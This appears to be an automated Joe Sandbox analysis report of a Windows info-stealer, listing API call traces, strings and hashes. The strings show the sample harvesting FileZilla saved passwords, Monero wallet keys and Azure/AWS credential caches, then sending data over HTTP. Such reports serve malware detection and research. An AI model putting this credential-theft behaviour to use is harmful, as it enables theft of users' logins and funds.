                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00380DBF,00380DBE,00380DBB,00380DBA), ref: 003704C2
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 003704C9
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 003704E5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 003704F3
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0037052F
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 0037053D
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00370579
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 00370587
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003705C3
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 003705D5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 00370662
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 0037067A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 00370692
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 003706AA
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 003706C2
                                    • lstrcat.KERNEL32(?,profile: null), ref: 003706D1
                                    • lstrcat.KERNEL32(?,url: ), ref: 003706E0
                                    • lstrcat.KERNEL32(?,00000000), ref: 003706F3
                                    • lstrcat.KERNEL32(?,00381770), ref: 00370702
                                    • lstrcat.KERNEL32(?,00000000), ref: 00370715
                                    • lstrcat.KERNEL32(?,00381774), ref: 00370724
                                    • lstrcat.KERNEL32(?,login: ), ref: 00370733
                                    • lstrcat.KERNEL32(?,00000000), ref: 00370746
                                    • lstrcat.KERNEL32(?,00381780), ref: 00370755
                                    • lstrcat.KERNEL32(?,password: ), ref: 00370764
                                    • lstrcat.KERNEL32(?,00000000), ref: 00370777
                                    • lstrcat.KERNEL32(?,00381790), ref: 00370786
                                    • lstrcat.KERNEL32(?,00381794), ref: 00370795
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB7), ref: 003707EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: c8f2601faca533b813ba86069b72163623c5fb4d9bddaeef8f67d979da380f02
                                    • Instruction ID: e6d03875127615cab2610f2dbbdb047d6c45192e2965003e5cafc0fddf035ed2
                                    • Opcode Fuzzy Hash: c8f2601faca533b813ba86069b72163623c5fb4d9bddaeef8f67d979da380f02
                                    • Instruction Fuzzy Hash: 09D13272910208ABCB25FBF0DD56EEE777DAF54300F50C558F106AA091EF38AA09CB61
                                    APIs
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 00364800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00364889
                                      • Part of subcall function 00364800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00364899
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00365A48
                                    • StrCmpCA.SHLWAPI(?,00F3E4F0), ref: 00365A63
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00365BE3
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00F3E570,00000000,?,00F39D68,00000000,?,00381B4C), ref: 00365EC1
                                    • lstrlen.KERNEL32(00000000), ref: 00365ED2
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00365EE3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00365EEA
                                    • lstrlen.KERNEL32(00000000), ref: 00365EFF
                                    • lstrlen.KERNEL32(00000000), ref: 00365F28
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00365F41
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00365F6B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00365F7F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00365F9C
                                    • InternetCloseHandle.WININET(00000000), ref: 00366000
                                    • InternetCloseHandle.WININET(00000000), ref: 0036600D
                                    • HttpOpenRequestA.WININET(00000000,00F3E500,?,00F3DBF0,00000000,00000000,00400100,00000000), ref: 00365C48
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00366017
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: 984533c499c5d8607bb40ebcd4c268ecb2cda1f3c1f665065bf1b85a05afc8d8
                                    • Instruction ID: 08928fcb8721ae572b178ea62db00f110a77acaa4e4ca466f634b2ecbc6586e9
                                    • Opcode Fuzzy Hash: 984533c499c5d8607bb40ebcd4c268ecb2cda1f3c1f665065bf1b85a05afc8d8
                                    • Instruction Fuzzy Hash: AE12F272920518ABCB26EBA0DCA5FEEB379BF54700F1081D9F10A66091EF746B48CF55
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 00378CF0: GetSystemTime.KERNEL32(00380E1B,00F39A38,003805B6,?,?,003613F9,?,0000001A,00380E1B,00000000,?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 00378D16
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0036D083
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0036D1C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0036D1CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 0036D308
                                    • lstrcat.KERNEL32(?,00381570), ref: 0036D317
                                    • lstrcat.KERNEL32(?,00000000), ref: 0036D32A
                                    • lstrcat.KERNEL32(?,00381574), ref: 0036D339
                                    • lstrcat.KERNEL32(?,00000000), ref: 0036D34C
                                    • lstrcat.KERNEL32(?,00381578), ref: 0036D35B
                                    • lstrcat.KERNEL32(?,00000000), ref: 0036D36E
                                    • lstrcat.KERNEL32(?,0038157C), ref: 0036D37D
                                    • lstrcat.KERNEL32(?,00000000), ref: 0036D390
                                    • lstrcat.KERNEL32(?,00381580), ref: 0036D39F
                                    • lstrcat.KERNEL32(?,00000000), ref: 0036D3B2
                                    • lstrcat.KERNEL32(?,00381584), ref: 0036D3C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 0036D3D4
                                    • lstrcat.KERNEL32(?,00381588), ref: 0036D3E3
                                      • Part of subcall function 0037AB30: lstrlen.KERNEL32(00364F55,?,?,00364F55,00380DDF), ref: 0037AB3B
                                      • Part of subcall function 0037AB30: lstrcpy.KERNEL32(00380DDF,00000000), ref: 0037AB95
                                    • lstrlen.KERNEL32(?), ref: 0036D42A
                                    • lstrlen.KERNEL32(?), ref: 0036D439
                                      • Part of subcall function 0037AD80: StrCmpCA.SHLWAPI(00000000,00381568,0036D2A2,00381568,00000000), ref: 0037AD9F
                                    • DeleteFileA.KERNEL32(00000000), ref: 0036D4B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: fa8f98707126d73d244be87b74887754803385ae1c870d92e443747a8cc2de78
                                    • Instruction ID: c5a653d3893ac07a97d5f9e40e5694a71845a17e2604aa9fdb301500c0dc19da
                                    • Opcode Fuzzy Hash: fa8f98707126d73d244be87b74887754803385ae1c870d92e443747a8cc2de78
                                    • Instruction Fuzzy Hash: 99E12671910508ABCB26FBA0DDA6EEE737DAF54301F108554F50B7A0A1DF35AE04CB61
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00F3CE38,00000000,?,00381544,00000000,?,?), ref: 0036CB6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0036CB89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0036CB95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0036CBA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0036CBD9
                                    • StrStrA.SHLWAPI(?,00F3CDF0,00380B56), ref: 0036CBF7
                                    • StrStrA.SHLWAPI(00000000,00F3CE08), ref: 0036CC1E
                                    • StrStrA.SHLWAPI(?,00F3D658,00000000,?,00381550,00000000,?,00000000,00000000,?,00F38AF0,00000000,?,0038154C,00000000,?), ref: 0036CDA2
                                    • StrStrA.SHLWAPI(00000000,00F3D758), ref: 0036CDB9
                                      • Part of subcall function 0036C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0036C971
                                      • Part of subcall function 0036C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0036C97C
                                    • StrStrA.SHLWAPI(?,00F3D758,00000000,?,00381554,00000000,?,00000000,00F38B70), ref: 0036CE5A
                                    • StrStrA.SHLWAPI(00000000,00F388B0), ref: 0036CE71
                                      • Part of subcall function 0036C920: lstrcat.KERNEL32(?,00380B47), ref: 0036CA43
                                      • Part of subcall function 0036C920: lstrcat.KERNEL32(?,00380B4B), ref: 0036CA57
                                      • Part of subcall function 0036C920: lstrcat.KERNEL32(?,00380B4E), ref: 0036CA78
                                    • lstrlen.KERNEL32(00000000), ref: 0036CF44
                                    • CloseHandle.KERNEL32(00000000), ref: 0036CF9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 7b437eb3b637c4291259486a3ebace2b1414fed61957fc71aa1ba0e545ab24b3
                                    • Instruction ID: de0b577b1f1098db1c77d5fa99b1a99a7ac9a2129c4e681b1c028f9476cb921a
                                    • Opcode Fuzzy Hash: 7b437eb3b637c4291259486a3ebace2b1414fed61957fc71aa1ba0e545ab24b3
                                    • Instruction Fuzzy Hash: C0E10571910508ABDB26EBA4DCA1FEEB779AF54300F108199F10BBB191DF346A49CF61
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • RegOpenKeyExA.ADVAPI32(00000000,00F3AB40,00000000,00020019,00000000,003805BE), ref: 00378534
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003785B6
                                    • wsprintfA.USER32 ref: 003785E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0037860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0037861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00378629
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: 743fd52228a808cda45621fabd2531495236aba74221e0b22091e1e1c0c550f0
                                    • Instruction ID: 8ce445f1691282d7021c6d00959d2b6950d1a37a3119d546a89d8c00a12c3011
                                    • Opcode Fuzzy Hash: 743fd52228a808cda45621fabd2531495236aba74221e0b22091e1e1c0c550f0
                                    • Instruction Fuzzy Hash: 5681EBB1911118ABDB69DB54CD95FEE77B9BF48700F10C2D8E10AA6140DF74AB89CFA0
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 003791FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: `d7F$`d7F$image/jpeg
                                    • API String ID: 2244384528-1338777330
                                    • Opcode ID: b8afddf818884ab411149deededbaab5dba580461cdc40e3e5363380fdc74c04
                                    • Instruction ID: a047aca9c2ee025d763bee2cf8a2016c42dd194846f776d76e8fe9dd984a7292
                                    • Opcode Fuzzy Hash: b8afddf818884ab411149deededbaab5dba580461cdc40e3e5363380fdc74c04
                                    • Instruction Fuzzy Hash: 7071EFB5910208ABDB24DFE4DC85FEEB7B9BF48700F148519F516AB294DB74A904CBA0
                                    APIs
                                      • Part of subcall function 00378F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00375000
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 0037501D
                                      • Part of subcall function 00374B60: wsprintfA.USER32 ref: 00374B7C
                                      • Part of subcall function 00374B60: FindFirstFileA.KERNEL32(?,?), ref: 00374B93
                                    • lstrcat.KERNEL32(?,00000000), ref: 0037508C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 003750A9
                                      • Part of subcall function 00374B60: StrCmpCA.SHLWAPI(?,00380FC4), ref: 00374BC1
                                      • Part of subcall function 00374B60: StrCmpCA.SHLWAPI(?,00380FC8), ref: 00374BD7
                                      • Part of subcall function 00374B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00374DCD
                                      • Part of subcall function 00374B60: FindClose.KERNEL32(000000FF), ref: 00374DE2
                                    • lstrcat.KERNEL32(?,00000000), ref: 00375118
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00375135
                                      • Part of subcall function 00374B60: wsprintfA.USER32 ref: 00374C00
                                      • Part of subcall function 00374B60: StrCmpCA.SHLWAPI(?,003808D3), ref: 00374C15
                                      • Part of subcall function 00374B60: wsprintfA.USER32 ref: 00374C32
                                      • Part of subcall function 00374B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00374C6E
                                      • Part of subcall function 00374B60: lstrcat.KERNEL32(?,00F3E530), ref: 00374C9A
                                      • Part of subcall function 00374B60: lstrcat.KERNEL32(?,00380FE0), ref: 00374CAC
                                      • Part of subcall function 00374B60: lstrcat.KERNEL32(?,?), ref: 00374CC0
                                      • Part of subcall function 00374B60: lstrcat.KERNEL32(?,00380FE4), ref: 00374CD2
                                      • Part of subcall function 00374B60: lstrcat.KERNEL32(?,?), ref: 00374CE6
                                      • Part of subcall function 00374B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00374CFC
                                      • Part of subcall function 00374B60: DeleteFileA.KERNEL32(?), ref: 00374D81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: fad6c0d7b904f0d45a373474b2f3196f182a6768b6649e683b74f53790707cbf
                                    • Instruction ID: ba4e29cac1e93e8409bba89a1f8ded92133cf204a5b4ee3915b83a8e386b6d00
                                    • Opcode Fuzzy Hash: fad6c0d7b904f0d45a373474b2f3196f182a6768b6649e683b74f53790707cbf
                                    • Instruction Fuzzy Hash: B34186BA94430467DB65F770EC97FDD733C5B54700F408594B649690C1EEB86BC88B92
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00373415
